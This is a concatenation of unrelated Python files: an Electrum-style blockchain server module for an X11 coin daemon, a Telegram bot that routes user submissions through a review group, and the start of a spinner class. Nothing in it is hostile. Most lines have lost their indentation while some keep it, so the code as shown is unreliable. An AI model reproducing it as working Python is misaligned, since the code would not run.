config.get('mued', 'mued_port'))
self.sent_height = 0
self.sent_header = None
# catch_up headers
self.init_headers(self.storage.height)
# start catch_up thread
if config.getboolean('leveldb', 'profiler'):
filename = os.path.join(config.get('leveldb', 'path'), 'profile')
print_log('profiled thread', filename)
self.blockchain_thread = ProfiledThread(filename, target = self.do_catch_up)
else:
self.blockchain_thread = threading.Thread(target = self.do_catch_up)
self.blockchain_thread.start()
def do_catch_up(self):
self.header = self.block2header(self.mued('getblock', (self.storage.last_hash,)))
self.header['utxo_root'] = self.storage.get_root_hash().encode('hex')
self.catch_up(sync=False)
if not self.shared.stopped():
print_log("Blockchain is up to date.")
self.memorypool_update()
print_log("Memory pool initialized.")
while not self.shared.stopped():
self.main_iteration()
if self.shared.paused():
print_log("mued is responding")
self.shared.unpause()
time.sleep(10)
def set_time(self):
self.time_ref = time.time()
def print_time(self, num_tx):
delta = time.time() - self.time_ref
# leaky averages
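        # The weight alpha decays roughly like 1/n for early samples (so the
        # first blocks count heavily) and settles toward a small constant
        # later, giving an exponential moving average; alpha2 rescales by the
        # share of time this block contributed so tx/s stays a per-second rate.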
seconds_per_block, tx_per_second, n = self.avg_time
alpha = (1. + 0.01 * n)/(n+1)
seconds_per_block = (1-alpha) * seconds_per_block + alpha * delta
alpha2 = alpha * delta / seconds_per_block
tx_per_second = (1-alpha2) * tx_per_second + alpha2 * num_tx / delta
self.avg_time = seconds_per_block, tx_per_second, n+1
if self.storage.height%100 == 0 \
or (self.storage.height%10 == 0 and self.storage.height >= 100000)\
or self.storage.height >= 200000:
msg = "block %d (%d %.2fs) %s" %(self.storage.height, num_tx, delta, self.storage.get_root_hash().encode('hex'))
msg += " (%.2ftx/s, %.2fs/block)" % (tx_per_second, seconds_per_block)
run_blocks = self.storage.height - self.start_catchup_height
remaining_blocks = self.mued_height - self.storage.height
if run_blocks>0 and remaining_blocks>0:
remaining_minutes = remaining_blocks * seconds_per_block / 60
new_blocks = int(remaining_minutes / 10) # number of new blocks expected during catchup
blocks_to_process = remaining_blocks + new_blocks
minutes = blocks_to_process * seconds_per_block / 60
rt = "%.0fmin"%minutes if minutes < 300 else "%.1f hours"%(minutes/60)
msg += " (eta %s, %d blocks)" % (rt, remaining_blocks)
print_log(msg)
def wait_on_mued(self):
self.shared.pause()
time.sleep(10)
if self.shared.stopped():
# this will end the thread
raise BaseException()
def mued(self, method, params=()):
postdata = dumps({"method": method, 'params': params, 'id': 'jsonrpc'})
while True:
try:
response = urllib.urlopen(self.mued_url, postdata)
r = load(response)
response.close()
except:
print_log("cannot reach mued...")
self.wait_on_mued()
else:
if r['error'] is not None:
if r['error'].get('code') == -28:
print_log("mued still warming up...")
self.wait_on_mued()
continue
raise BaseException(r['error'])
break
return r.get('result')
@staticmethod
def block2header(b):
return {
"block_height": b.get('height'),
"version": b.get('version'),
"prev_block_hash": b.get('previousblockhash'),
"merkle_root": b.get('merkleroot'),
"timestamp": b.get('time'),
"bits": int(b.get('bits'), 16),
"nonce": b.get('nonce'),
}
def get_header(self, height):
        block_hash = self.mued('getblockhash', (height,))
        b = self.mued('getblock', (block_hash,))
return self.block2header(b)
def init_headers(self, db_height):
self.headers_filename = os.path.join(self.headers_path, 'blockchain_headers')
if os.path.exists(self.headers_filename):
height = os.path.getsize(self.headers_filename)/80 - 1 # the current height
if height > 0:
prev_hash = self.hash_header(self.read_header(height))
else:
prev_hash = None
else:
open(self.headers_filename, 'wb').close()
prev_hash = None
height = -1
if height < db_height:
print_log("catching up missing headers:", height, db_height)
try:
while height < db_height:
height += 1
header = self.get_header(height)
if height > 1:
if prev_hash != header.get('prev_block_hash'):
# The prev_hash block is orphaned, go back
print_log("reorganizing, a block in file is orphaned:", prev_hash)
# Go to the parent of the orphaned block
height -= 2
prev_hash = self.hash_header(self.read_header(height))
continue
self.write_header(header, sync=False)
prev_hash = self.hash_header(header)
if (height % 1000) == 0:
print_log("headers file:", height)
except KeyboardInterrupt:
self.flush_headers()
sys.exit()
self.flush_headers()
@staticmethod
def hash_header(header):
return rev_hex(HashX11(header_to_string(header).decode('hex')).encode('hex'))
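    # Note: the header is serialized, hashed with X11 (this chain's
    # proof-of-work hash rather than double-SHA256), and the hex digest is
    # byte-reversed so it matches the hash strings the daemon reports.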
def read_header(self, block_height):
if os.path.exists(self.headers_filename):
with open(self.headers_filename, 'rb') as f:
f.seek(block_height * 80)
h = f.read(80)
if len(h) == 80:
h = header_from_string(h)
return h
def read_chunk(self, index):
with open(self.headers_filename, 'rb') as f:
f.seek(index*2016*80)
chunk = f.read(2016*80)
return chunk.encode('hex')
def write_header(self, header, sync=True):
if not self.headers_data:
self.headers_offset = header.get('block_height')
self.headers_data += header_to_string(header).decode('hex')
        if sync or len(self.headers_data) > 80*100:  # flush roughly every 100 headers (80 bytes each)
self.flush_headers()
with self.cache_lock:
chunk_index = header.get('block_height')/2016
if chunk_index in self.chunk_cache:
del self.chunk_cache[chunk_index]
    def pop_header(self):
        # we need to do this only if we have not flushed
        if self.headers_data:
            self.headers_data = self.headers_data[:-80]  # headers are 80 bytes each, not 40
def flush_headers(self):
if not self.headers_data:
return
with open(self.headers_filename, 'rb+') as f:
f.seek(self.headers_offset*80)
f.write(self.headers_data)
self.headers_data = ''
def get_chunk(self, i):
# store them on disk; store the current chunk in memory
with self.cache_lock:
chunk = self.chunk_cache.get(i)
if not chunk:
chunk = self.read_chunk(i)
if chunk:
self.chunk_cache[i] = chunk
return chunk
def get_mempool_transaction(self, txid):
try:
            raw_tx = self.mued('getrawtransaction', (txid, 0))
except:
return None
vds = deserialize.BCDataStream()
vds.write(raw_tx.decode('hex'))
try:
return deserialize.parse_Transaction(vds, is_coinbase=False)
except:
print_log("ERROR: cannot parse", txid)
return None
def get_unconfirmed_history(self, addr):
hist = []
with self.mempool_lock:
for tx_hash, delta in self.mempool_hist.get(addr, ()):
height = -1 if self.mempool_unconfirmed.get(tx_hash) else 0
fee = self.mempool_fees.get(tx_hash)
hist.append({'tx_hash':tx_hash, 'height':height, 'fee':fee})
return hist
def get_history(self, addr, cache_only=False):
with self.cache_lock:
hist = self.history_cache.get(addr)
if hist is not None:
return hist
if cache_only:
return -1
hist = self.storage.get_history(addr)
hist.extend(self.get_unconfirmed_history(addr))
with self.cache_lock:
if len(self.history_cache) > self.max_cache_size:
logger.info("clearing cache")
self.history_cache.clear()
self.history_cache[addr] = hist
return hist
def get_unconfirmed_value(self, addr):
v = 0
with self.mempool_lock:
for txid, delta in self.mempool_hist.get(addr, ()):
v += delta
return v
def get_status(self, addr, cache_only=False):
tx_points = self.get_history(addr, cache_only)
if cache_only and tx_points == -1:
return -1
if not tx_points:
return None
if tx_points == ['*']:
return '*'
status = ''.join(tx.get('tx_hash') + ':%d:' % tx.get('height') for tx in tx_points)
return hashlib.sha256(status).digest().encode('hex')
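    # Illustrative status computation (hypothetical values): for a history of
    # [{'tx_hash': 'aa..', 'height': 5}, {'tx_hash': 'bb..', 'height': -1}]
    # the status string is 'aa..:5:bb..:-1:' and the result is its sha256
    # digest, hex-encoded -- the format Electrum-style clients compare against.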
def get_merkle(self, tx_hash, height, cache_only):
with self.cache_lock:
out = self.merkle_cache.get(tx_hash)
if out is not None:
return out
if cache_only:
return -1
        block_hash = self.mued('getblockhash', (height,))
        b = self.mued('getblock', (block_hash,))
tx_list = b.get('tx')
tx_pos = tx_list.index(tx_hash)
merkle = map(hash_decode, tx_list)
target_hash = hash_decode(tx_hash)
s = []
while len(merkle) != 1:
if len(merkle) % 2:
merkle.append(merkle[-1])
n = []
while merkle:
new_hash = Hash(merkle[0] + merkle[1])
if merkle[0] == target_hash:
s.append(hash_encode(merkle[1]))
target_hash = new_hash
elif merkle[1] == target_hash:
s.append(hash_encode(merkle[0]))
target_hash = new_hash
n.append(new_hash)
merkle = merkle[2:]
merkle = n
out = {"block_height": height, "merkle": s, "pos": tx_pos}
with self.cache_lock:
if len(self.merkle_cache) > self.max_cache_size:
logger.info("clearing merkle cache")
self.merkle_cache.clear()
self.merkle_cache[tx_hash] = out
return out
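    # Verification sketch (client side, assuming this method's output): fold
    # the branch back up to the merkle root, pairing with Hash at each level:
    #
    #     h = hash_decode(tx_hash)
    #     for i, item in enumerate(out['merkle']):
    #         node = hash_decode(item)
    #         h = Hash(node + h) if (out['pos'] >> i) & 1 else Hash(h + node)
    #     # h should now equal the block's merkle root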
@staticmethod
def deserialize_block(block):
txlist = block.get('tx')
tx_hashes = [] # ordered txids
txdict = {} # deserialized tx
is_coinbase = True
for raw_tx in txlist:
tx_hash = hash_encode(Hash(raw_tx.decode('hex')))
vds = deserialize.BCDataStream()
vds.write(raw_tx.decode('hex'))
try:
tx = deserialize.parse_Transaction(vds, is_coinbase)
except:
print_log("ERROR: cannot parse", tx_hash)
continue
tx_hashes.append(tx_hash)
txdict[tx_hash] = tx
is_coinbase = False
return tx_hashes, txdict
def import_block(self, block, block_hash, block_height, revert=False):
touched_addr = set()
# deserialize transactions
tx_hashes, txdict = self.deserialize_block(block)
# undo info
if revert:
undo_info = self.storage.get_undo_info(block_height)
tx_hashes.reverse()
else:
undo_info = {}
for txid in tx_hashes: # must be ordered
tx = txdict[txid]
if not revert:
undo = self.storage.import_transaction(txid, tx, block_height, touched_addr)
undo_info[txid] = undo
else:
undo = undo_info.pop(txid)
self.storage.revert_transaction(txid, tx, block_height, touched_addr, undo)
if revert:
assert undo_info == {}
# add undo info
if not revert:
            self.storage.write_undo_info(block_height, self.mued_height, undo_info)
# add the max
self.storage.save_height(block_hash, block_height)
for addr in touched_addr:
self.invalidate_cache(addr)
self.storage.update_hashes()
# batch write modified nodes
self.storage.batch_write()
# return length for monitoring
return len(tx_hashes)
def add_request(self, session, request):
# see if we can get if from cache. if not, add request to queue
message_id = request.get('id')
try:
result = self.process(request, cache_only=True)
except BaseException as e:
self.push_response(session, {'id': message_id, 'error': str(e)})
return
if result == -1:
self.queue.put((session, request))
else:
self.push_response(session, {'id': message_id, 'result': result})
def do_subscribe(self, method, params, session):
with self.watch_lock:
if method == 'blockchain.numblocks.subscribe':
if session not in self.watch_blocks:
self.watch_blocks.append(session)
elif method == 'blockchain.headers.subscribe':
if session not in self.watch_headers:
self.watch_headers.append(session)
elif method == 'blockchain.address.subscribe':
address = params[0]
l = self.watched_addresses.get(address)
if l is None:
self.watched_addresses[address] = [session]
elif session not in l:
l.append(session)
def do_unsubscribe(self, method, params, session):
with self.watch_lock:
if method == 'blockchain.numblocks.subscribe':
if session in self.watch_blocks:
self.watch_blocks.remove(session)
elif method == 'blockchain.headers.subscribe':
if session in self.watch_headers:
self.watch_headers.remove(session)
elif method == "blockchain.address.subscribe":
addr = params[0]
l = self.watched_addresses.get(addr)
if not l:
return
if session in l:
l.remove(session)
if session in l:
print_log("error rc!!")
self.shared.stop()
if l == []:
del self.watched_addresses[addr]
def process(self, request, cache_only=False):
message_id = request['id']
method = request['method']
params = request.get('params', ())
result = None
error = None
if method == 'blockchain.numblocks.subscribe':
result = self.storage.height
elif method == 'blockchain.headers.subscribe':
result = self.header
elif method == 'blockchain.address.subscribe':
address = str(params[0])
result = self.get_status(address, cache_only)
elif method == 'blockchain.address.get_history':
address = str(params[0])
result = self.get_history(address, cache_only)
elif method == 'blockchain.address.get_mempool':
address = str(params[0])
result = self.get_unconfirmed_history(address)
elif method == 'blockchain.address.get_balance':
address = str(params[0])
confirmed = self.storage.get_balance(address)
unconfirmed = self.get_unconfirmed_value(address)
result = { 'confirmed':confirmed, 'unconfirmed':unconfirmed }
elif method == 'blockchain.address.get_proof':
address = str(params[0])
result = self.storage.get_proof(address)
elif method == 'blockchain.address.listunspent':
address = str(params[0])
result = self.storage.listunspent(address)
elif method == 'blockchain.utxo.get_address':
txid = str(params[0])
pos = int(params[1])
txi = (txid + int_to_hex4(pos)).decode('hex')
result = self.storage.get_address(txi)
elif method == 'blockchain.block.get_header':
if cache_only:
result = -1
else:
height = int(params[0])
result = self.get_header(height)
elif method == 'blockchain.block.get_chunk':
if cache_only:
result = -1
else:
index = int(params[0])
result = self.get_chunk(index)
elif method == 'blockchain.transaction.broadcast':
try:
                txo = self.mued('sendrawtransaction', params)
print_log("sent tx:", txo)
result = txo
            except BaseException as e:
error = e.args[0]
if error["code"] == -26:
# If we return anything that's not the transaction hash,
# it's considered an error message
message = error["message"]
if "non-mandatory-script-verify-flag" in message:
result = "Your client produced a transaction that is not accepted by the Bitcoin network any more. Please upgrade to Electrum 2.5.1 or newer\n"
else:
result = "The transaction was rejected by network rules.(" + message + ")\n" \
"[" + params[0] + "]"
else:
result = error["message"] # do send an error
print_log("error:", result)
elif method == 'blockchain.transaction.get_merkle':
tx_hash = params[0]
tx_height = params[1]
result = self.get_merkle(tx_hash, tx_height, cache_only)
elif method == 'blockchain.transaction.get':
tx_hash = params[0]
            result = self.mued('getrawtransaction', (tx_hash, 0))
        elif method == 'blockchain.estimatefee':
            num = int(params[0])
            result = self.mued('estimatefee', (num,))
elif method == 'blockchain.relayfee':
result = self.relayfee
else:
raise BaseException("unknown method:%s" % method)
return result
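    # Example request/response shapes handled above (values hypothetical):
    #   {'id': 1, 'method': 'blockchain.address.get_balance', 'params': ['Xabc...']}
    # returns a dict like {'confirmed': 150000000, 'unconfirmed': 0}, while
    # subscribe methods return the value to watch and rely on push_response
    # for later notifications.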
def get_block(self, block_hash):
        block = self.mued('getblock', (block_hash,))
rawtxreq = []
i = 0
for txid in block['tx']:
rawtxreq.append({
"method": "getrawtransaction",
"params": (txid,),
"id": i,
})
i += 1
postdata = dumps(rawtxreq)
while True:
try:
                response = urllib.urlopen(self.mued_url, postdata)
                r = load(response)
                response.close()
            except:
                logger.error("mued error (getfullblock)")
                self.wait_on_mued()
                continue
            try:
                rawtxdata = []
                for ir in r:
                    assert ir['error'] is None, "Error: make sure you run mued with txindex=1; use -reindex if needed."
                    rawtxdata.append(ir['result'])
            except BaseException as e:
                logger.error(str(e))
                self.wait_on_mued()
continue
block['tx'] = rawtxdata
return block
def catch_up(self, sync=True):
self.start_catchup_height = self.storage.height
prev_root_hash = None
n = 0
while not self.shared.stopped():
# are we done yet?
            info = self.mued('getinfo')
            self.relayfee = info.get('relayfee')
            self.mued_height = info.get('blocks')
            mued_block_hash = self.mued('getblockhash', (self.mued_height,))
            if self.storage.last_hash == mued_block_hash:
self.up_to_date = True
break
self.set_time()
revert = (random.randint(1, 100) == 1) if self.test_reorgs and self.storage.height>100 else False
# not done..
self.up_to_date = False
try:
                next_block_hash = self.mued('getblockhash', (self.storage.height + 1,))
            except BaseException as e:
revert = True
next_block = self.get_block(next_block_hash if not revert else self.storage.last_hash)
if (next_block.get('previousblockhash') == self.storage.last_hash) and not revert:
prev_root_hash = self.storage.get_root_hash()
n = self.import_block(next_block, next_block_hash, self.storage.height+1)
self.storage.height = self.storage.height + 1
self.write_header(self.block2header(next_block), sync)
self.storage.last_hash = next_block_hash
else:
# revert current block
block = self.get_block(self.storage.last_hash)
print_log("blockchain reorg", self.storage.height, block.get('previousblockhash'), self.storage.last_hash)
n = self.import_block(block, self.storage.last_hash, self.storage.height, revert=True)
self.pop_header()
self.flush_headers()
self.storage.height -= 1
# read previous header from disk
self.header = self.read_header(self.storage.height)
self.storage.last_hash = self.hash_header(self.header)
if prev_root_hash:
assert prev_root_hash == self.storage.get_root_hash()
prev_root_hash = None
# print time
self.print_time(n)
        self.header = self.block2header(self.mued('getblock', (self.storage.last_hash,)))
self.header['utxo_root'] = self.storage.get_root_hash().encode('hex')
if self.shared.stopped():
print_log( "closing database" )
self.storage.close()
def memorypool_update(self):
t0 = time.time()
        mempool_hashes = set(self.mued('getrawmempool'))
touched_addresses = set()
# get new transactions
new_tx = {}
for tx_hash in mempool_hashes:
if tx_hash in self.mempool_hashes:
continue
tx = self.get_mempool_transaction(tx_hash)
if not tx:
continue
new_tx[tx_hash] = tx
# remove older entries from mempool_hashes
self.mempool_hashes = mempool_hashes
# check all tx outputs
for tx_hash, tx in new_tx.iteritems():
mpa = self.mempool_addresses.get(tx_hash, {})
out_values = []
out_sum = 0
for x in tx.get('outputs'):
addr = x.get('address', '')
value = x['value']
out_values.append((addr, value))
if not addr:
continue
v = mpa.get(addr, 0)
v += value
mpa[addr] = v
touched_addresses.add(addr)
out_sum += value
            self.mempool_fees[tx_hash] = -out_sum  # fee = inputs - outputs; input_sum is added below
self.mempool_addresses[tx_hash] = mpa
self.mempool_values[tx_hash] = out_values
self.mempool_unconfirmed[tx_hash] = set()
# check all inputs
for tx_hash, tx in new_tx.iteritems():
mpa = self.mempool_addresses.get(tx_hash, {})
# are we spending unconfirmed inputs?
input_sum = 0
for x in tx.get('inputs'):
prev_hash = x.get('prevout_hash')
prev_n = x.get('prevout_n')
mpv = self.mempool_values.get(prev_hash)
if mpv:
addr, value = mpv[prev_n]
self.mempool_unconfirmed[tx_hash].add(prev_hash)
else:
txi = (prev_hash + int_to_hex4(prev_n)).decode('hex')
try:
addr = self.storage.get_address(txi)
value = self.storage.get_utxo_value(addr,txi)
except:
print_log("utxo not in database; postponing mempool update")
return
# we can proceed
input_sum += value
if not addr:
continue
v = mpa.get(addr, 0)
v -= value
mpa[addr] = v
touched_addresses.add(addr)
self.mempool_addresses[tx_hash] = mpa
self.mempool_fees[tx_hash] += input_sum
# remove deprecated entries from mempool_addresses
for tx_hash, addresses in self.mempool_addresses.items():
if tx_hash not in self.mempool_hashes:
del self.mempool_addresses[tx_hash]
del self.mempool_values[tx_hash]
del self.mempool_unconfirmed[tx_hash]
del self.mempool_fees[tx_hash]
touched_addresses.update(addresses)
# remove deprecated entries from mempool_hist
new_mempool_hist = {}
for addr in self.mempool_hist.iterkeys():
h = self.mempool_hist[addr]
hh = []
for tx_hash, delta in h:
if tx_hash in self.mempool_addresses:
hh.append((tx_hash, delta))
if hh:
new_mempool_hist[addr] = hh
# add new transactions to mempool_hist
for tx_hash in new_tx.iterkeys():
addresses = self.mempool_addresses[tx_hash]
for addr, delta in addresses.iteritems():
h = new_mempool_hist.get(addr, [])
if (tx_hash, delta) not in h:
h.append((tx_hash, delta))
new_mempool_hist[addr] = h
with self.mempool_lock:
self.mempool_hist = new_mempool_hist
# invalidate cache for touched addresses
for addr in touched_addresses:
self.invalidate_cache(addr)
t1 = time.time()
if t1-t0>1:
print_log('mempool_update', t1-t0, len(self.mempool_hashes), len(self.mempool_hist))
def invalidate_cache(self, address):
with self.cache_lock:
if address in self.history_cache:
# print_log("cache: invalidating", address)
del self.history_cache[address]
with self.watch_lock:
sessions = self.watched_addresses.get(address)
if sessions:
# TODO: update cache here. if new value equals cached value, do not send notification
self.address_queue.put((address,sessions))
def close(self):
self.blockchain_thread.join()
print_log("Closing database...")
self.storage.close()
print_log("Database is closed")
def main_iteration(self):
if self.shared.stopped():
print_log("Stopping timer")
return
self.catch_up()
self.memorypool_update()
if self.sent_height != self.storage.height:
self.sent_height = self.storage.height
for session in self.watch_blocks:
self.push_response(session, {
'id': None,
'method': 'blockchain.numblocks.subscribe',
'params': (self.storage.height,),
})
if self.sent_header != self.header:
self.sent_header = self.header
for session in self.watch_headers:
self.push_response(session, {
'id': None,
'method': 'blockchain.headers.subscribe',
'params': (self.header,),
})
while True:
try:
addr, sessions = self.address_queue.get(False)
except:
break
status = self.get_status(addr)
for session in sessions:
self.push_response(session, {
'id': None,
'method': 'blockchain.address.subscribe',
'params': (addr, status),
})
|
main.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import time
import json
import telegram.ext
import telegram
import sys
import datetime
import os
import logging
import threading
import six
if six.PY2:
reload(sys)
sys.setdefaultencoding('utf8')
Version_Code = 'v1.0.0'
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s'
)
PATH = os.path.dirname(os.path.realpath(__file__)) + '/'
with open(PATH + 'config.json', 'r') as f:
    CONFIG = json.load(f)
DATA_LOCK = False
with open(PATH + 'data.json', 'r') as f:
    submission_list = json.load(f)
def save_data():
global DATA_LOCK
while DATA_LOCK:
time.sleep(0.05)
DATA_LOCK = True
f = open(PATH + 'data.json', 'w')
f.write(json.dumps(submission_list, ensure_ascii=False))
f.close()
DATA_LOCK = False
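# Note: DATA_LOCK is a cooperative busy-wait flag; a sketch with a real lock
# (an alternative, not the original design) would be:
#
#     SAVE_LOCK = threading.Lock()
#     def save_data():
#         with SAVE_LOCK:
#             with open(PATH + 'data.json', 'w') as f:
#                 f.write(json.dumps(submission_list, ensure_ascii=False))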
def save_config():
f = open(PATH + 'config.json', 'w')
f.write(json.dumps(CONFIG, indent=4))
f.close()
updater = telegram.ext.Updater(token=CONFIG['Token'])
dispatcher = updater.dispatcher
me = updater.bot.get_me()
CONFIG['ID'] = me.id
CONFIG['Username'] = '@' + me.username
print('Starting... (ID: ' + str(CONFIG['ID']) + ', Username: ' + CONFIG['Username'] + ')')
def process_msg(bot, update):
if update.channel_post != None:
return
print('update_from_user_id', update.message.from_user.id)
print('update_chat_id', update.message.chat_id)
print('config_group_id', CONFIG['Group_ID'])
if update.message.chat_id == CONFIG['Group_ID'] \
and update.message.reply_to_message != None:
if update.message.reply_to_message.from_user.id == CONFIG['ID'] \
and (update.message.reply_to_message.forward_from != None
or update.message.reply_to_message.forward_from_chat
!= None):
msg = update.message.reply_to_message
global submission_list
if submission_list[str(CONFIG['Group_ID']) + ':'
+ str(msg.message_id)]['posted'] == True:
return
if submission_list[str(CONFIG['Group_ID']) + ':'
+ str(msg.message_id)]['type'] == 'real':
post = real_name_post(bot, msg,
update.message.from_user)
elif submission_list[str(CONFIG['Group_ID']) + ':'
+ str(msg.message_id)]['type'] \
== 'anonymous':
post = anonymous_post(bot, msg,
update.message.from_user)
if update.message.text != None:
bot.send_message(chat_id=CONFIG['Publish_Channel_ID'],
text=update.message.text,
reply_to_message_id=post.message_id)
return
if update.message.from_user.id == update.message.chat_id:
markup = \
telegram.InlineKeyboardMarkup([[telegram.InlineKeyboardButton("是"
, callback_data='submission_type:real'),
telegram.InlineKeyboardButton("否",
callback_data='submission_type:anonymous')],
[telegram.InlineKeyboardButton("取消投稿",
callback_data='cancel:submission')]])
if update.message.forward_from != None \
or update.message.forward_from_chat != None:
if update.message.forward_from_chat != None:
markup = \
telegram.InlineKeyboardMarkup([[telegram.InlineKeyboardButton("是"
, callback_data='submission_type:real')],
[telegram.InlineKeyboardButton("取消投稿",
callback_data='cancel:submission')]])
elif update.message.forward_from.id \
!= update.message.from_user.id:
markup = \
telegram.InlineKeyboardMarkup([[telegram.InlineKeyboardButton("是"
, callback_data='submission_type:real')],
[telegram.InlineKeyboardButton("取消投稿",
callback_data='cancel:submission')]])
bot.send_message(chat_id=update.message.chat_id,
text="即将完成投稿...\n您是否想要保留消息来源(保留消息发送者用户名,若要申请解封ID,请选择保留用户名)",
reply_to_message_id=update.message.message_id,
reply_markup=markup)
def process_command(bot, update):
if update.channel_post != None:
return
command = update.message.text[1:].replace(CONFIG['Username'], ''
).lower()
if command == 'start':
bot.send_message(chat_id=update.message.chat_id,
text="""可接收的投稿类型:
文字
图片
音频/语音
视频
文件""")
return
if command == 'version':
bot.send_message(chat_id=update.message.chat_id,
text='Telegram Submission Bot\n'
+ Version_Code
+ '\nhttps://github.com/Netrvin/telegram-submission-bot'
)
return
if update.message.from_user.id == CONFIG['Admin']:
if command == 'setgroup':
CONFIG['Group_ID'] = update.message.chat_id
save_config()
bot.send_message(chat_id=update.message.chat_id,
text="已设置本群为审稿群")
return
def anonymous_post(bot, msg, editor):
if msg.audio != None:
r = bot.send_audio(chat_id=CONFIG['Publish_Channel_ID'],
audio=msg.audio, caption=msg.caption)
elif msg.document != None:
r = bot.send_document(chat_id=CONFIG['Publish_Channel_ID'],
document=msg.document,
caption=msg.caption)
elif msg.voice != None:
r = bot.send_voice(chat_id=CONFIG['Publish_Channel_ID'],
voice=msg.voice, caption=msg.caption)
elif msg.video != None:
r = bot.send_video(chat_id=CONFIG['Publish_Channel_ID'],
video=msg.video, caption=msg.caption)
elif msg.photo:
        r = bot.send_photo(chat_id=CONFIG['Publish_Channel_ID'],
                           photo=msg.photo[-1], caption=msg.caption)  # last PhotoSize is the largest
else:
r = bot.send_message(chat_id=CONFIG['Publish_Channel_ID'],
text=msg.text_markdown,
parse_mode=telegram.ParseMode.MARKDOWN)
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(msg.message_id)]['posted'] = True
bot.edit_message_text(text="新投稿\n投稿人: ["
+ submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_Name']
+ '](tg://user?id='
+ str(submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_ID'])
+ """)
来源: 匿名
审稿人: [""" + editor.name
+ '](tg://user?id=' + str(editor.id)
+ ")\n已采用", chat_id=CONFIG['Group_ID'],
parse_mode=telegram.ParseMode.MARKDOWN,
message_id=submission_list[str(CONFIG['Group_ID'
]) + ':' + str(msg.message_id)]['Markup_ID'])
bot.send_message(chat_id=submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_ID'],
text="您的稿件已过审,感谢您对我们的支持",
reply_to_message_id=submission_list[str(CONFIG['Group_ID'
]) + ':' + str(msg.message_id)]['Original_MsgID'])
threading.Thread(target=save_data).start()
return r
def real_name_post(bot, msg, editor):
global submission_list
r = bot.forward_message(chat_id=CONFIG['Publish_Channel_ID'],
from_chat_id=CONFIG['Group_ID'],
message_id=msg.message_id)
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(msg.message_id)]['posted'] = True
bot.edit_message_text(text="新投稿\n投稿人: ["
+ submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_Name']
+ '](tg://user?id='
+ str(submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_ID'])
+ """)
来源: 保留
审稿人: [""" + editor.name
+ '](tg://user?id=' + str(editor.id)
+ ")\n已采用", chat_id=CONFIG['Group_ID'],
parse_mode=telegram.ParseMode.MARKDOWN,
message_id=submission_list[str(CONFIG['Group_ID'
]) + ':' + str(msg.message_id)]['Markup_ID'])
bot.send_message(chat_id=submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_ID'],
text="您的稿件已过审,感谢您对我们的支持",
reply_to_message_id=submission_list[str(CONFIG['Group_ID'
]) + ':' + str(msg.message_id)]['Original_MsgID'])
threading.Thread(target=save_data).start()
return r
def process_callback(bot, update):
if update.channel_post != None:
return
global submission_list
query = update.callback_query
if query.message.chat_id == CONFIG['Group_ID'] and query.data \
== 'receive:real':
real_name_post(bot, query.message.reply_to_message,
query.from_user)
return
if query.message.chat_id == CONFIG['Group_ID'] and query.data \
== 'receive:anonymous':
anonymous_post(bot, query.message.reply_to_message,
query.from_user)
return
if query.data == 'cancel:submission':
bot.edit_message_text(text="已取消投稿",
chat_id=query.message.chat_id,
message_id=query.message.message_id)
return
msg = "新投稿\n投稿人: [" + query.message.reply_to_message.from_user.name \
+ '](tg://user?id=' \
+ str(query.message.reply_to_message.from_user.id) + ")\n来源: "
fwd_msg = bot.forward_message(chat_id=CONFIG['Group_ID'],
from_chat_id=query.message.chat_id,
message_id=query.message.reply_to_message.message_id)
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)] = {}
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['posted'] = False
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['Sender_Name'] = \
query.message.reply_to_message.from_user.name
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['Sender_ID'] = \
query.message.reply_to_message.from_user.id
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['Original_MsgID'] = \
query.message.reply_to_message.message_id
if query.data == 'submission_type:real':
msg += "保留"
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['type'] = 'real'
markup = \
telegram.InlineKeyboardMarkup([[telegram.InlineKeyboardButton("采用"
, callback_data='receive:real')]])
markup_msg = bot.send_message(chat_id=CONFIG['Group_ID'],
text=msg, reply_to_message_id=fwd_msg.message_id,
reply_markup=markup,
parse_mode=telegram.ParseMode.MARKDOWN)
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['Markup_ID'] = \
markup_msg.message_id
elif query.data == 'submission_type:anonymous':
msg += "匿名"
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['type'] = 'anonymous'
markup = \
telegram.InlineKeyboardMarkup([[telegram.InlineKeyboardButton("采用"
, callback_data='receive:anonymous')]])
markup_msg = bot.send_message(chat_id=CONFIG['Group_ID'],
text=msg, reply_to_message_id=fwd_msg.message_id,
reply_markup=markup,
parse_mode=telegram.ParseMode.MARKDOWN)
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['Markup_ID'] = \
markup_msg.message_id
bot.edit_message_text(text="感谢您的投稿", chat_id=query.message.chat_id,
message_id=query.message.message_id)
threading.Thread(target=save_data).start()
dispatcher.add_handler(telegram.ext.MessageHandler(telegram.ext.Filters.text
| telegram.ext.Filters.audio
| telegram.ext.Filters.photo
| telegram.ext.Filters.video
| telegram.ext.Filters.voice
| telegram.ext.Filters.document, process_msg))
dispatcher.add_handler(telegram.ext.MessageHandler(telegram.ext.Filters.command,
process_command))
dispatcher.add_handler(telegram.ext.CallbackQueryHandler(process_callback))
updater.start_polling()
print('Started')
updater.idle()
print('Stopping...')
save_data()
print('Data saved.')
print('Stopped.')
|
spinner.py
|
# Copyright (c) 2018, Vanessa Sochat All rights reserved.
# See the LICENSE in the main repository at:
# https://www.github.com/openschemas/openschemas-python
import os
import sys
import time
import threading
from random import choice
class Spinner:
spinning = False
